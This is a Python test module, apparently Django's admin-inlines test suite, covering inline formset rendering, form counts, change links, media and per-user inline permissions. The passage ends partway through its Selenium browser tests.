from __future__ import unicode_literals
import datetime
from django.contrib.admin import ModelAdmin, TabularInline
from django.contrib.admin.helpers import InlineAdminForm
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.auth.models import Permission, User
from django.contrib.contenttypes.models import ContentType
from django.test import RequestFactory, TestCase, override_settings
from django.urls import reverse
from .admin import InnerInline, site as admin_site
from .models import (
Author, BinaryTree, Book, Chapter, Child, ChildModel1, ChildModel2,
Fashionista, FootNote, Holder, Holder2, Holder3, Holder4, Inner, Inner2,
Inner3, Inner4Stacked, Inner4Tabular, Novel, OutfitItem, Parent,
ParentModelWithCustomPk, Person, Poll, Profile, ProfileCollection,
Question, Sighting, SomeChildModel, SomeParentModel, Teacher,
)
# Anchor-tag fragment emitted for an inline's "show_change_link" link;
# tests assert its presence/absence in rendered admin pages.
INLINE_CHANGELINK_HTML = 'class="inlinechangelink">Change</a>'
class TestDataMixin(object):
    """Shared fixture: one superuser the test classes log in with."""

    @classmethod
    def setUpTestData(cls):
        # The password hash below is the SHA1 digest of "secret"; the test
        # classes override PASSWORD_HASHERS so client.login(password='secret')
        # matches it.
        moment = datetime.datetime(2007, 5, 30, 13, 20, 10)
        User.objects.create(
            pk=100,
            username='super',
            password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158',
            first_name='Super',
            last_name='User',
            email='super@example.com',
            is_active=True,
            is_staff=True,
            is_superuser=True,
            last_login=moment,
            date_joined=moment,
        )
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
                   ROOT_URLCONF="admin_inlines.urls")
class TestInline(TestDataMixin, TestCase):
    """Rendering and formset behavior of admin inlines (stacked and tabular)."""

    def setUp(self):
        # One Holder with a single Inner so change views have an existing inline row.
        holder = Holder(dummy=13)
        holder.save()
        Inner(dummy=42, holder=holder).save()
        result = self.client.login(username='super', password='secret')
        self.assertEqual(result, True)
        # Used by tests that call ModelAdmin views directly (test_min_num & co).
        self.factory = RequestFactory()

    def test_can_delete(self):
        """
        can_delete should be passed to inlineformset factory.
        """
        holder = Holder.objects.get(dummy=13)
        response = self.client.get(
            reverse('admin:admin_inlines_holder_change', args=(holder.id,))
        )
        inner_formset = response.context['inline_admin_formsets'][0].formset
        expected = InnerInline.can_delete
        actual = inner_formset.can_delete
        self.assertEqual(expected, actual, 'can_delete must be equal')

    def test_readonly_stacked_inline_label(self):
        """Bug #13174."""
        holder = Holder.objects.create(dummy=42)
        Inner.objects.create(holder=holder, dummy=42, readonly='')
        response = self.client.get(
            reverse('admin:admin_inlines_holder_change', args=(holder.id,))
        )
        self.assertContains(response, '<label>Inner readonly label:</label>')

    def test_many_to_many_inlines(self):
        "Autogenerated many-to-many inlines are displayed correctly (#13407)"
        response = self.client.get(reverse('admin:admin_inlines_author_add'))
        # The heading for the m2m inline block uses the right text
        self.assertContains(response, '<h2>Author-book relationships</h2>')
        # The "add another" label is correct
        self.assertContains(response, 'Add another Author-book relationship')
        # The '+' is dropped from the autogenerated form prefix (Author_books+)
        self.assertContains(response, 'id="id_Author_books-TOTAL_FORMS"')

    def test_inline_primary(self):
        """Posting a parent with one inline row creates the related object."""
        person = Person.objects.create(firstname='Imelda')
        item = OutfitItem.objects.create(name='Shoes')
        # Imelda likes shoes, but can't carry her own bags.
        data = {
            'shoppingweakness_set-TOTAL_FORMS': 1,
            'shoppingweakness_set-INITIAL_FORMS': 0,
            'shoppingweakness_set-MAX_NUM_FORMS': 0,
            '_save': 'Save',
            'person': person.id,
            'max_weight': 0,
            'shoppingweakness_set-0-item': item.id,
        }
        response = self.client.post(reverse('admin:admin_inlines_fashionista_add'), data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(Fashionista.objects.filter(person__firstname='Imelda')), 1)

    def test_custom_form_tabular_inline_label(self):
        """
        A model form with a form field specified (TitleForm.title1) should have
        its label rendered in the tabular inline.
        """
        response = self.client.get(reverse('admin:admin_inlines_titlecollection_add'))
        self.assertContains(response, '<th class="required">Title1</th>', html=True)

    def test_tabular_non_field_errors(self):
        """
        Ensure that non_field_errors are displayed correctly, including the
        right value for colspan. Refs #13510.
        """
        data = {
            'title_set-TOTAL_FORMS': 1,
            'title_set-INITIAL_FORMS': 0,
            'title_set-MAX_NUM_FORMS': 0,
            '_save': 'Save',
            'title_set-0-title1': 'a title',
            'title_set-0-title2': 'a different title',
        }
        response = self.client.post(reverse('admin:admin_inlines_titlecollection_add'), data)
        # Here colspan is "4": two fields (title1 and title2), one hidden field and the delete checkbox.
        self.assertContains(
            response,
            '<tr><td colspan="4"><ul class="errorlist nonfield">'
            '<li>The two titles must be the same</li></ul></td></tr>'
        )

    def test_no_parent_callable_lookup(self):
        """Admin inline `readonly_field` shouldn't invoke parent ModelAdmin callable"""
        # Identically named callable isn't present in the parent ModelAdmin,
        # rendering of the add view shouldn't explode
        response = self.client.get(reverse('admin:admin_inlines_novel_add'))
        self.assertEqual(response.status_code, 200)
        # View should have the child inlines section
        self.assertContains(
            response,
            '<div class="js-inline-admin-formset inline-group" id="chapter_set-group"'
        )

    def test_callable_lookup(self):
        """Admin inline should invoke local callable when its name is listed in readonly_fields"""
        response = self.client.get(reverse('admin:admin_inlines_poll_add'))
        self.assertEqual(response.status_code, 200)
        # Add parent object view should have the child inlines section
        self.assertContains(
            response,
            '<div class="js-inline-admin-formset inline-group" id="question_set-group"'
        )
        # The right callable should be used for the inline readonly_fields
        # column cells
        self.assertContains(response, '<p>Callable in QuestionInline</p>')

    def test_help_text(self):
        """
        Ensure that the inlines' model field help texts are displayed when
        using both the stacked and tabular layouts.
        Ref #8190.
        """
        response = self.client.get(reverse('admin:admin_inlines_holder4_add'))
        self.assertContains(response, '<p class="help">Awesome stacked help text is awesome.</p>', 4)
        self.assertContains(
            response,
            '<img src="/static/admin/img/icon-unknown.svg" '
            'class="help help-tooltip" width="10" height="10" '
            'alt="(Awesome tabular help text is awesome.)" '
            'title="Awesome tabular help text is awesome." />',
            1
        )
        # ReadOnly fields
        response = self.client.get(reverse('admin:admin_inlines_capofamiglia_add'))
        self.assertContains(
            response,
            '<img src="/static/admin/img/icon-unknown.svg" '
            'class="help help-tooltip" width="10" height="10" '
            'alt="(Help text for ReadOnlyInline)" '
            'title="Help text for ReadOnlyInline" />',
            1
        )

    def test_inline_hidden_field_no_column(self):
        """#18263 -- Make sure hidden fields don't get a column in tabular inlines"""
        parent = SomeParentModel.objects.create(name='a')
        SomeChildModel.objects.create(name='b', position='0', parent=parent)
        SomeChildModel.objects.create(name='c', position='1', parent=parent)
        response = self.client.get(reverse('admin:admin_inlines_someparentmodel_change', args=(parent.pk,)))
        self.assertNotContains(response, '<td class="field-position">')
        self.assertContains(response, (
            '<input id="id_somechildmodel_set-1-position" '
            'name="somechildmodel_set-1-position" type="hidden" value="1" />'))

    def test_non_related_name_inline(self):
        """
        Ensure that multiple inlines with related_name='+' have correct form
        prefixes. Bug #16838.
        """
        response = self.client.get(reverse('admin:admin_inlines_capofamiglia_add'))
        self.assertContains(response,
                            '<input type="hidden" name="-1-0-id" id="id_-1-0-id" />', html=True)
        self.assertContains(response,
                            '<input type="hidden" name="-1-0-capo_famiglia" id="id_-1-0-capo_famiglia" />', html=True)
        self.assertContains(response,
                            '<input id="id_-1-0-name" type="text" class="vTextField" '
                            'name="-1-0-name" maxlength="100" />', html=True)
        self.assertContains(response,
                            '<input type="hidden" name="-2-0-id" id="id_-2-0-id" />', html=True)
        self.assertContains(response,
                            '<input type="hidden" name="-2-0-capo_famiglia" id="id_-2-0-capo_famiglia" />', html=True)
        self.assertContains(response,
                            '<input id="id_-2-0-name" type="text" class="vTextField" '
                            'name="-2-0-name" maxlength="100" />', html=True)

    @override_settings(USE_L10N=True, USE_THOUSAND_SEPARATOR=True)
    def test_localize_pk_shortcut(self):
        """
        Ensure that the "View on Site" link is correct for locales that use
        thousand separators
        """
        holder = Holder.objects.create(pk=123456789, dummy=42)
        inner = Inner.objects.create(pk=987654321, holder=holder, dummy=42, readonly='')
        response = self.client.get(reverse('admin:admin_inlines_holder_change', args=(holder.id,)))
        # Shortcut URLs must use the raw pk, not the localized rendering.
        inner_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(inner).pk, inner.pk)
        self.assertContains(response, inner_shortcut)

    def test_custom_pk_shortcut(self):
        """
        Ensure that the "View on Site" link is correct for models with a
        custom primary key field. Bug #18433.
        """
        parent = ParentModelWithCustomPk.objects.create(my_own_pk="foo", name="Foo")
        child1 = ChildModel1.objects.create(my_own_pk="bar", name="Bar", parent=parent)
        child2 = ChildModel2.objects.create(my_own_pk="baz", name="Baz", parent=parent)
        response = self.client.get(reverse('admin:admin_inlines_parentmodelwithcustompk_change', args=('foo',)))
        child1_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(child1).pk, child1.pk)
        child2_shortcut = 'r/%s/%s/' % (ContentType.objects.get_for_model(child2).pk, child2.pk)
        self.assertContains(response, child1_shortcut)
        self.assertContains(response, child2_shortcut)

    def test_create_inlines_on_inherited_model(self):
        """
        Ensure that an object can be created with inlines when it inherits
        another class. Bug #19524.
        """
        data = {
            'name': 'Martian',
            'sighting_set-TOTAL_FORMS': 1,
            'sighting_set-INITIAL_FORMS': 0,
            'sighting_set-MAX_NUM_FORMS': 0,
            'sighting_set-0-place': 'Zone 51',
            '_save': 'Save',
        }
        response = self.client.post(reverse('admin:admin_inlines_extraterrestrial_add'), data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(Sighting.objects.filter(et__name='Martian').count(), 1)

    def test_custom_get_extra_form(self):
        """get_max_num on the inline's ModelAdmin is respected on add and change views."""
        bt_head = BinaryTree.objects.create(name="Tree Head")
        BinaryTree.objects.create(name="First Child", parent=bt_head)
        # The maximum number of forms should respect 'get_max_num' on the
        # ModelAdmin
        max_forms_input = (
            '<input id="id_binarytree_set-MAX_NUM_FORMS" '
            'name="binarytree_set-MAX_NUM_FORMS" type="hidden" value="%d" />'
        )
        # The total number of forms will remain the same in either case
        total_forms_hidden = (
            '<input id="id_binarytree_set-TOTAL_FORMS" '
            'name="binarytree_set-TOTAL_FORMS" type="hidden" value="2" />'
        )
        response = self.client.get(reverse('admin:admin_inlines_binarytree_add'))
        self.assertContains(response, max_forms_input % 3)
        self.assertContains(response, total_forms_hidden)
        response = self.client.get(reverse('admin:admin_inlines_binarytree_change', args=(bt_head.id,)))
        self.assertContains(response, max_forms_input % 2)
        self.assertContains(response, total_forms_hidden)

    def test_min_num(self):
        """
        Ensure that min_num and extra determine number of forms.
        """
        class MinNumInline(TabularInline):
            model = BinaryTree
            min_num = 2
            extra = 3
        modeladmin = ModelAdmin(BinaryTree, admin_site)
        modeladmin.inlines = [MinNumInline]
        min_forms = (
            '<input id="id_binarytree_set-MIN_NUM_FORMS" '
            'name="binarytree_set-MIN_NUM_FORMS" type="hidden" value="2" />'
        )
        # TOTAL_FORMS == min_num + extra == 5
        total_forms = (
            '<input id="id_binarytree_set-TOTAL_FORMS" '
            'name="binarytree_set-TOTAL_FORMS" type="hidden" value="5" />'
        )
        request = self.factory.get(reverse('admin:admin_inlines_binarytree_add'))
        request.user = User(username='super', is_superuser=True)
        response = modeladmin.changeform_view(request)
        self.assertContains(response, min_forms)
        self.assertContains(response, total_forms)

    def test_custom_min_num(self):
        """
        Ensure that get_min_num is called and used correctly.
        """
        bt_head = BinaryTree.objects.create(name="Tree Head")
        BinaryTree.objects.create(name="First Child", parent=bt_head)

        class MinNumInline(TabularInline):
            model = BinaryTree
            extra = 3

            def get_min_num(self, request, obj=None, **kwargs):
                # min_num depends on whether an existing object is being edited.
                if obj:
                    return 5
                return 2
        modeladmin = ModelAdmin(BinaryTree, admin_site)
        modeladmin.inlines = [MinNumInline]
        min_forms = (
            '<input id="id_binarytree_set-MIN_NUM_FORMS" '
            'name="binarytree_set-MIN_NUM_FORMS" type="hidden" value="%d" />'
        )
        total_forms = (
            '<input id="id_binarytree_set-TOTAL_FORMS" '
            'name="binarytree_set-TOTAL_FORMS" type="hidden" value="%d" />'
        )
        request = self.factory.get(reverse('admin:admin_inlines_binarytree_add'))
        request.user = User(username='super', is_superuser=True)
        response = modeladmin.changeform_view(request)
        self.assertContains(response, min_forms % 2)
        self.assertContains(response, total_forms % 5)
        request = self.factory.get(reverse('admin:admin_inlines_binarytree_change', args=(bt_head.id,)))
        request.user = User(username='super', is_superuser=True)
        response = modeladmin.changeform_view(request, object_id=str(bt_head.id))
        self.assertContains(response, min_forms % 5)
        self.assertContains(response, total_forms % 8)

    def test_inline_nonauto_noneditable_pk(self):
        """Non-auto, non-editable PKs are rendered as hidden inputs in inlines."""
        response = self.client.get(reverse('admin:admin_inlines_author_add'))
        self.assertContains(
            response,
            '<input id="id_nonautopkbook_set-0-rand_pk" '
            'name="nonautopkbook_set-0-rand_pk" type="hidden" />',
            html=True
        )
        self.assertContains(
            response,
            '<input id="id_nonautopkbook_set-2-0-rand_pk" '
            'name="nonautopkbook_set-2-0-rand_pk" type="hidden" />',
            html=True
        )

    def test_inline_editable_pk(self):
        """Editable PKs are rendered as visible text inputs in inlines."""
        response = self.client.get(reverse('admin:admin_inlines_author_add'))
        self.assertContains(
            response,
            '<input class="vIntegerField" id="id_editablepkbook_set-0-manual_pk" '
            'name="editablepkbook_set-0-manual_pk" type="text" />',
            html=True, count=1
        )
        self.assertContains(
            response,
            '<input class="vIntegerField" id="id_editablepkbook_set-2-0-manual_pk" '
            'name="editablepkbook_set-2-0-manual_pk" type="text" />',
            html=True, count=1
        )

    def test_stacked_inline_edit_form_contains_has_original_class(self):
        """Existing stacked-inline rows get the has_original class; extra rows don't."""
        holder = Holder.objects.create(dummy=1)
        holder.inner_set.create(dummy=1)
        response = self.client.get(reverse('admin:admin_inlines_holder_change', args=(holder.pk,)))
        self.assertContains(
            response,
            '<div class="inline-related has_original" id="inner_set-0">',
            count=1
        )
        self.assertContains(
            response,
            '<div class="inline-related" id="inner_set-1">',
            count=1
        )

    def test_inlines_show_change_link_registered(self):
        "Inlines `show_change_link` for registered models when enabled."
        holder = Holder4.objects.create(dummy=1)
        item1 = Inner4Stacked.objects.create(dummy=1, holder=holder)
        item2 = Inner4Tabular.objects.create(dummy=1, holder=holder)
        items = (
            ('inner4stacked', item1.pk),
            ('inner4tabular', item2.pk),
        )
        response = self.client.get(reverse('admin:admin_inlines_holder4_change', args=(holder.pk,)))
        self.assertTrue(response.context['inline_admin_formset'].opts.has_registered_model)
        for model, pk in items:
            url = reverse('admin:admin_inlines_%s_change' % model, args=(pk,))
            self.assertContains(response, '<a href="%s" %s' % (url, INLINE_CHANGELINK_HTML))

    def test_inlines_show_change_link_unregistered(self):
        "Inlines `show_change_link` disabled for unregistered models."
        parent = ParentModelWithCustomPk.objects.create(my_own_pk="foo", name="Foo")
        ChildModel1.objects.create(my_own_pk="bar", name="Bar", parent=parent)
        ChildModel2.objects.create(my_own_pk="baz", name="Baz", parent=parent)
        response = self.client.get(reverse('admin:admin_inlines_parentmodelwithcustompk_change', args=('foo',)))
        self.assertFalse(response.context['inline_admin_formset'].opts.has_registered_model)
        self.assertNotContains(response, INLINE_CHANGELINK_HTML)

    def test_tabular_inline_show_change_link_false_registered(self):
        "Inlines `show_change_link` disabled by default."
        poll = Poll.objects.create(name="New poll")
        Question.objects.create(poll=poll)
        response = self.client.get(reverse('admin:admin_inlines_poll_change', args=(poll.pk,)))
        self.assertTrue(response.context['inline_admin_formset'].opts.has_registered_model)
        self.assertNotContains(response, INLINE_CHANGELINK_HTML)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
                   ROOT_URLCONF="admin_inlines.urls")
class TestInlineMedia(TestDataMixin, TestCase):
    """Media (JS) declared on a ModelAdmin and/or its inlines is served together."""

    def setUp(self):
        # TestDataMixin created the superuser; every request needs a logged-in admin.
        logged_in = self.client.login(username='super', password='secret')
        self.assertEqual(logged_in, True)

    def test_inline_media_only_base(self):
        """Media declared only on the parent ModelAdmin appears on the change page."""
        parent = Holder(dummy=13)
        parent.save()
        Inner(dummy=42, holder=parent).save()
        url = reverse('admin:admin_inlines_holder_change', args=(parent.id,))
        self.assertContains(self.client.get(url), 'my_awesome_admin_scripts.js')

    def test_inline_media_only_inline(self):
        """Media declared only on the inline appears on the change page."""
        parent = Holder3(dummy=13)
        parent.save()
        Inner3(dummy=42, holder=parent).save()
        url = reverse('admin:admin_inlines_holder3_change', args=(parent.id,))
        self.assertContains(self.client.get(url), 'my_awesome_inline_scripts.js')

    def test_all_inline_media(self):
        """Media from the parent ModelAdmin and from its inline are both included."""
        parent = Holder2(dummy=13)
        parent.save()
        Inner2(dummy=42, holder=parent).save()
        url = reverse('admin:admin_inlines_holder2_change', args=(parent.id,))
        page = self.client.get(url)
        self.assertContains(page, 'my_awesome_admin_scripts.js')
        self.assertContains(page, 'my_awesome_inline_scripts.js')
@override_settings(ROOT_URLCONF="admin_inlines.urls")
class TestInlineAdminForm(TestCase):

    def test_immutable_content_type(self):
        """
        Regression for #9362: constructing an InlineAdminForm must not alter
        the content_type attribute of its "original" object. The problem
        depends only on the "original" argument, so the remaining constructor
        arguments can safely be None/{}.
        """
        teacher = Teacher.objects.create(name='Sally')
        father = Parent.objects.create(name='John')
        kid = Child.objects.create(name='Joe', teacher=teacher, parent=father)
        inline_form = InlineAdminForm(None, None, {}, {}, kid)
        expected_ct = ContentType.objects.get_for_model(Parent)
        self.assertEqual(inline_form.original.content_type, expected_ct)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
                   ROOT_URLCONF="admin_inlines.urls")
class TestInlineProtectedOnDelete(TestDataMixin, TestCase):
    """Deleting an inline whose related objects are protected must not validate."""

    def setUp(self):
        logged_in = self.client.login(username='super', password='secret')
        self.assertEqual(logged_in, True)

    def test_deleting_inline_with_protected_delete_does_not_validate(self):
        novel = Novel.objects.create(name='Lord of the rings')
        chapter = Chapter.objects.create(novel=novel, name='Many Meetings')
        note = FootNote.objects.create(chapter=chapter, note='yadda yadda')
        url = reverse('admin:admin_inlines_novel_change', args=(novel.id,))
        response = self.client.get(url)
        post_data = {
            'name': novel.name,
            'chapter_set-TOTAL_FORMS': 1,
            'chapter_set-INITIAL_FORMS': 1,
            'chapter_set-MAX_NUM_FORMS': 1000,
            '_save': 'Save',
            'chapter_set-0-id': chapter.id,
            'chapter_set-0-name': chapter.name,
            'chapter_set-0-novel': novel.id,
            'chapter_set-0-DELETE': 'on',
        }
        response = self.client.post(url, post_data)
        # The chapter has a protected FootNote, so the delete must be refused
        # with an explanatory validation message.
        expected_message = (
            "Deleting chapter %s would require deleting "
            "the following protected related objects: foot note %s" % (chapter, note)
        )
        self.assertContains(response, expected_message)
@override_settings(ROOT_URLCONF="admin_inlines.urls")
class TestInlinePermissions(TestCase):
    """
    Make sure the admin respects permissions for objects that are edited
    inline. Refs #8060.
    """

    def setUp(self):
        # A staff user with full permissions on the PARENT models only
        # (Author, Holder2); inline-model permissions vary per test.
        self.user = User(username='admin')
        self.user.is_staff = True
        self.user.is_active = True
        self.user.set_password('secret')
        self.user.save()
        self.author_ct = ContentType.objects.get_for_model(Author)
        self.holder_ct = ContentType.objects.get_for_model(Holder2)
        self.book_ct = ContentType.objects.get_for_model(Book)
        self.inner_ct = ContentType.objects.get_for_model(Inner2)
        # User always has permissions to add and change Authors, and Holders,
        # the main (parent) models of the inlines. Permissions on the inlines
        # vary per test.
        permission = Permission.objects.get(codename='add_author', content_type=self.author_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='change_author', content_type=self.author_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='add_holder2', content_type=self.holder_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='change_holder2', content_type=self.holder_ct)
        self.user.user_permissions.add(permission)
        author = Author.objects.create(pk=1, name='The Author')
        book = author.books.create(name='The inline Book')
        self.author_change_url = reverse('admin:admin_inlines_author_change', args=(author.id,))
        # Get the ID of the automatically created intermediate model for the Author-Book m2m
        author_book_auto_m2m_intermediate = Author.books.through.objects.get(author=author, book=book)
        self.author_book_auto_m2m_intermediate_id = author_book_auto_m2m_intermediate.pk
        holder = Holder2.objects.create(dummy=13)
        inner2 = Inner2.objects.create(dummy=42, holder=holder)
        self.holder_change_url = reverse('admin:admin_inlines_holder2_change', args=(holder.id,))
        self.inner2_id = inner2.id
        self.assertEqual(
            self.client.login(username='admin', password='secret'),
            True)

    def test_inline_add_m2m_noperm(self):
        """Without book permissions, the m2m inline is absent from the add view."""
        response = self.client.get(reverse('admin:admin_inlines_author_add'))
        # No change permission on books, so no inline
        self.assertNotContains(response, '<h2>Author-book relationships</h2>')
        self.assertNotContains(response, 'Add another Author-Book Relationship')
        self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')

    def test_inline_add_fk_noperm(self):
        """Without Inner2 permissions, the FK inline is absent from the add view."""
        response = self.client.get(reverse('admin:admin_inlines_holder2_add'))
        # No permissions on Inner2s, so no inline
        self.assertNotContains(response, '<h2>Inner2s</h2>')
        self.assertNotContains(response, 'Add another Inner2')
        self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')

    def test_inline_change_m2m_noperm(self):
        """Without book permissions, the m2m inline is absent from the change view."""
        response = self.client.get(self.author_change_url)
        # No change permission on books, so no inline
        self.assertNotContains(response, '<h2>Author-book relationships</h2>')
        self.assertNotContains(response, 'Add another Author-Book Relationship')
        self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')

    def test_inline_change_fk_noperm(self):
        """Without Inner2 permissions, the FK inline is absent from the change view."""
        response = self.client.get(self.holder_change_url)
        # No permissions on Inner2s, so no inline
        self.assertNotContains(response, '<h2>Inner2s</h2>')
        self.assertNotContains(response, 'Add another Inner2')
        self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')

    def test_inline_add_m2m_add_perm(self):
        """Add permission alone on the m2m's model doesn't expose the inline."""
        permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(reverse('admin:admin_inlines_author_add'))
        # No change permission on Books, so no inline
        self.assertNotContains(response, '<h2>Author-book relationships</h2>')
        self.assertNotContains(response, 'Add another Author-Book Relationship')
        self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')

    def test_inline_add_fk_add_perm(self):
        """Add permission on the FK inline model shows the inline on the add view."""
        permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(reverse('admin:admin_inlines_holder2_add'))
        # Add permission on inner2s, so we get the inline
        self.assertContains(response, '<h2>Inner2s</h2>')
        self.assertContains(response, 'Add another Inner2')
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
                            'value="3" name="inner2_set-TOTAL_FORMS" />', html=True)

    def test_inline_change_m2m_add_perm(self):
        """Add permission alone on books doesn't expose the m2m inline on change."""
        permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.author_change_url)
        # No change permission on books, so no inline
        self.assertNotContains(response, '<h2>Author-book relationships</h2>')
        self.assertNotContains(response, 'Add another Author-Book Relationship')
        self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
        self.assertNotContains(response, 'id="id_Author_books-0-DELETE"')

    def test_inline_change_m2m_change_perm(self):
        """Change permission on books allows add/change/delete via the m2m inline."""
        permission = Permission.objects.get(codename='change_book', content_type=self.book_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.author_change_url)
        # We have change perm on books, so we can add/change/delete inlines
        self.assertContains(response, '<h2>Author-book relationships</h2>')
        self.assertContains(response, 'Add another Author-book relationship')
        self.assertContains(response, '<input type="hidden" id="id_Author_books-TOTAL_FORMS" '
                            'value="4" name="Author_books-TOTAL_FORMS" />', html=True)
        self.assertContains(
            response,
            '<input type="hidden" id="id_Author_books-0-id" value="%i" '
            'name="Author_books-0-id" />' % self.author_book_auto_m2m_intermediate_id,
            html=True
        )
        self.assertContains(response, 'id="id_Author_books-0-DELETE"')

    def test_inline_change_fk_add_perm(self):
        """Add-only permission: extra blank forms appear, existing rows don't."""
        permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.holder_change_url)
        # Add permission on inner2s, so we can add but not modify existing
        self.assertContains(response, '<h2>Inner2s</h2>')
        self.assertContains(response, 'Add another Inner2')
        # 3 extra forms only, not the existing instance form
        self.assertContains(
            response,
            '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" value="3" '
            'name="inner2_set-TOTAL_FORMS" />',
            html=True
        )
        self.assertNotContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
                               'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)

    def test_inline_change_fk_change_perm(self):
        """Change-only permission: existing row is editable but no new forms appear."""
        permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.holder_change_url)
        # Change permission on inner2s, so we can change existing but not add new
        self.assertContains(response, '<h2>Inner2s</h2>')
        # Just the one form for existing instances
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
                            'value="1" name="inner2_set-TOTAL_FORMS" />', html=True)
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
                            'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
        # max-num 0 means we can't add new ones
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-MAX_NUM_FORMS" '
                            'value="0" name="inner2_set-MAX_NUM_FORMS" />', html=True)

    def test_inline_change_fk_add_change_perm(self):
        """Add + change permissions: existing row plus the extra blank forms."""
        permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.holder_change_url)
        # Add/change perm, so we can add new and change existing
        self.assertContains(response, '<h2>Inner2s</h2>')
        # One form for existing instance and three extra for new
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
                            'value="4" name="inner2_set-TOTAL_FORMS" />', html=True)
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
                            'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)

    def test_inline_change_fk_change_del_perm(self):
        """Change + delete permissions: existing row editable and deletable, no new forms."""
        permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.holder_change_url)
        # Change/delete perm on inner2s, so we can change/delete existing
        self.assertContains(response, '<h2>Inner2s</h2>')
        # One form for existing instance only, no new
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
                            'value="1" name="inner2_set-TOTAL_FORMS" />', html=True)
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
                            'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
        self.assertContains(response, 'id="id_inner2_set-0-DELETE"')

    def test_inline_change_fk_all_perms(self):
        """All permissions: existing row editable/deletable plus extra blank forms."""
        permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
        self.user.user_permissions.add(permission)
        response = self.client.get(self.holder_change_url)
        # All perms on inner2s, so we can add/change/delete
        self.assertContains(response, '<h2>Inner2s</h2>')
        # One form for existing instance only, three for new
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-TOTAL_FORMS" '
                            'value="4" name="inner2_set-TOTAL_FORMS" />', html=True)
        self.assertContains(response, '<input type="hidden" id="id_inner2_set-0-id" '
                            'value="%i" name="inner2_set-0-id" />' % self.inner2_id, html=True)
        self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
                   ROOT_URLCONF="admin_inlines.urls")
class SeleniumFirefoxTests(AdminSeleniumWebDriverTestCase):
    """
    Browser-driven tests for dynamic admin inlines ("Add another XXX" /
    delete links, collapsed inlines, alternating row styles).

    Runs against Firefox; the Chrome/IE variants below subclass this and
    only override ``webdriver_class``.
    """
    available_apps = ['admin_inlines'] + AdminSeleniumWebDriverTestCase.available_apps
    webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'

    def setUp(self):
        # Create the superuser used by admin_login(). The hash below is the
        # SHA1 hash of the password "secret" (SHA1 hasher enabled via the
        # class-level override_settings).
        User.objects.create(
            pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
            password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
            is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
            date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
        )

    def test_add_stackeds(self):
        """
        Ensure that the "Add another XXX" link correctly adds items to the
        stacked formset.
        """
        self.admin_login(username='super', password='secret')
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('admin:admin_inlines_holder4_add')))

        inline_id = '#inner4stacked_set-group'

        # PEP 8 (E731): use a nested def rather than assigning a lambda.
        def rows_length():
            return len(self.selenium.find_elements_by_css_selector(
                '%s .dynamic-inner4stacked_set' % inline_id))

        self.assertEqual(rows_length(), 3)

        add_button = self.selenium.find_element_by_link_text(
